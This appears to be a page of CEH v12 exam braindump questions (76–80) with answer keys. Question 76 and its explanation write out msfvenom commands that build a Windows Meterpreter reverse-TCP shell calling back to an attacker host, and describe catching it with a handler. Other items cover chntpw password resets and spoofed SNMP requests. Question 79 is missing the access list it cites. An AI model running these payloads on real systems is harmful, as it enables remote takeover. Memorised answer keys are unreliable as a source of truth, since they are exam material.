Free 312-50v12 Exam Braindumps

Pass your Certified Ethical Hacker (CEHv12) exam with these free Questions and Answers

Page 17 of 101
QUESTION 76

- (Exam Topic 2)
What is the correct way of using MSFvenom to generate a reverse TCP shellcode for Windows?

  1. A. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f c
  2. B. msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f c
  3. C. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f exe > shell.exe
  4. D. msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f exe > shell.exe

Correct Answer: C
https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom
Often one of the most useful (and, to the beginner, underrated) abilities of Metasploit is the msfpayload module. Multiple payloads can be created with this module, and it helps create something that can give you a shell in almost any situation. For each of these payloads you can go into msfconsole and select exploit/multi/handler. Run ‘set payload’ for the relevant payload used and configure all necessary options (LHOST, LPORT, etc.). Execute and wait for the payload to be run. The examples below are pretty self-explanatory, but LHOST should be filled in with your IP address (LAN IP if attacking within the network, WAN IP if attacking across the internet), and LPORT should be the port you wish to be connected back on.
Example for Windows:
- msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT= -f exe > shell.exe

QUESTION 77

- (Exam Topic 1)
You have gained physical access to a Windows 2008 R2 server which has an accessible disc drive. When you attempt to boot the server and log in, you are unable to guess the password. In your toolkit, you have an Ubuntu 9.10 Linux LiveCD. Which Linux-based tool can change any user’s password or activate disabled Windows accounts?

  1. A. John the Ripper
  2. B. SET
  3. C. CHNTPW
  4. D. Cain & Abel

Correct Answer: C

QUESTION 78

- (Exam Topic 1)
Which of the following statements about a zone transfer is correct? (Choose three.)

  1. A. A zone transfer is accomplished with the DNS
  2. B. A zone transfer is accomplished with the nslookup service
  3. C. A zone transfer passes all zone information that a DNS server maintains
  4. D. A zone transfer passes all zone information that a nslookup server maintains
  5. E. A zone transfer can be prevented by blocking all inbound TCP port 53 connections
  6. F. Zone transfers cannot occur on the Internet

Correct Answer: ACE

QUESTION 79

- (Exam Topic 2)
The network administrator at Spears Technology, Inc has configured the default gateway Cisco router's access-list as below:
You are hired to conduct security testing on their network.
You successfully brute-force the SNMP community string using an SNMP crack tool.
The access-list configured at the router prevents you from establishing a successful connection. You want to retrieve the Cisco configuration from the router. How would you proceed?

  1. A. Use the Cisco's TFTP default password to connect and download the configuration file
  2. B. Run a network sniffer and capture the returned traffic with the configuration file from the router
  3. C. Run Generic Routing Encapsulation (GRE) tunneling protocol from your computer to the router masking your IP address
  4. D. Send a customized SNMP set request with a spoofed source IP address in the range -192.168.1.0

Correct Answer: BD

QUESTION 80

- (Exam Topic 1)
Which of the following algorithms can be used to guarantee the integrity of messages being sent, in transit, or stored?

  1. A. symmetric algorithms
  2. B. asymmetric algorithms
  3. C. hashing algorithms
  4. D. integrity algorithms

Correct Answer: C
